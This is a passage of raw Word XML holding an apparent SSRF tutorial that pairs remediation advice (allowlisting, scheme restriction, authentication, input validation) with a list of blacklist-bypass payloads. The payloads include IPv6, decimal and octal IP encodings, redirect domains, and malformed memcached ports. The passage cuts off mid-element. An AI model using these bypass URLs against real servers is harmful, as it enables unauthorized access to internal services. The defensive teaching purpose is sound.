        <w:t>https://target.com/page?url=http://192.0.0.192/latest/attributes/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7943B2AE" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Preventing SSRF Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352AB7A5" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Here are the primary ways to remediate server side vulnerabilities, to prevent SSRF attacks on your servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D4074A" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Whitelist Domains in DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B286D42" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The easiest way to remediate SSRF is to whitelist any domain or address that your application accesses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F472D7" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Blacklisting and regex have the same issue, someone will eventually find a way to exploit them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E6713C" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Do Not Send Raw Responses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6792B714" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Never send a raw response body from the server to the client. Responses that the client receives need to be expected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02866185" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Enforce URL Schemas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7857EA54" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Allow only URL schemas that your application uses. There is no need to have ftp://, file:/// or even http:// enabled if you only use https://.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC58F81" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>And if you do use other schemas make sure that they’re only accessible from the part that needs to access them and not from anywhere else.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391F2380" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Enable Authentication on All Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA1C4F5" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Make sure that authentication is enabled on any service that is running inside your network even if they don’t require it. Services like memcached, redis, mongo and others don’t require authentication for normal operations, but this means they can be exploited.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0DD494" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sanitize and Validate Inputs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA1090E" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Never trust user input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E54F60" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Always sanitize any input that the user sends to your application. Remove bad characters, standardize input (double quotes instead of single quotes for example).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7023084A" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>After sanitization make sure to validate sanitized input to make sure nothing bad passed through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B01E6BD" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why is it Ineffective to Blacklist Domains and IPs? Understanding SSRF Bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FD8AD8" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>One way to protect against SSRF is to blacklist certain domains and IP addresses. This defense technique is not effective, because hackers can use bypasses to avoid your security measures. Below are a few simple ways attackers can bypass blacklists.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C4646D" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bypassing Blacklists Using HTTPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104D68EA" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Common blacklists blocking everything on port 80 or the http scheme. but the server will handle requests to 443 or https just fine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BE9F25" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Instead of using http://127.0.0.1/ use: https://127.0.0.1/ https://localhost/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEC0285" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bypassing Blacklists Using Localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C296502" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The most common blacklist is blacklisting IP addresses like 127.0.0.1 or localhost. To bypass these blacklists you can use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B14DC83" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>With [::], abuses IPv6 to exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5C5ED1" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://[::]/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AE2782" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://[::]:80/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782E66D0" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://0000::1/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272B296F" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://0000::1:80/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE14225" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>With domain redirection, useful when all IP addresses are blacklisted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B34F79" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://localtest.me</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFC9A1E" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://test.app.127.0.0.1.nip.io</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B13D79" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://test-app-127-0-0-1.nip.io</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45903D39" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>httP://test.app.127.0.0.1.xip.io</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49898D9F" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>With CIDR, useful when just 127.0.0.1 is whitelisted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0AE567" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://127.127.127.127/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660F75AF" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://127.0.1.3/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A22AF89" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>https:/127.0.0.0/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB5095E" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>With IPv6/IPv4 address embedding, useful when both IPv4 and IPv6 are blacklisted (but blacklisted badly)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F351284" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://[0:0:0:0:0:ffff:127.0.0.1]/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32145B13" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>With decimal IP location, really useful if dots are blacklisted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F6AAF6" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://0177.0.0.1/ --&gt; (127.0.0.1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F098F02" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://2130706433/ --&gt; (127.0.0.1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC0324B" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://3232235521/ --&gt; (192.168.0.1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645636BE" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://3232235777/ --&gt; (192.168.1.1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7F0C82" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>With malformed URLs, useful when port is blacklisted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570FD03C" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>localhost:+11211aaa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B4750D" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>localhost:00011211aaaa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FB32BC" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>localhost:11211</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D64D48" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>With shorthanding IP addresses by dropping zeros, useful when full IP address is whitelisted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5FAE15" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://0/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA616D2" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://127.1/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C66328" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://127.0.1/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D6F2D1" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>With enclosed alphanumerics, useful when just plain ASCII characters are blacklisted but servers interpret enclosed alphanumerics as normal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212DE404" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://①②⑦.</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
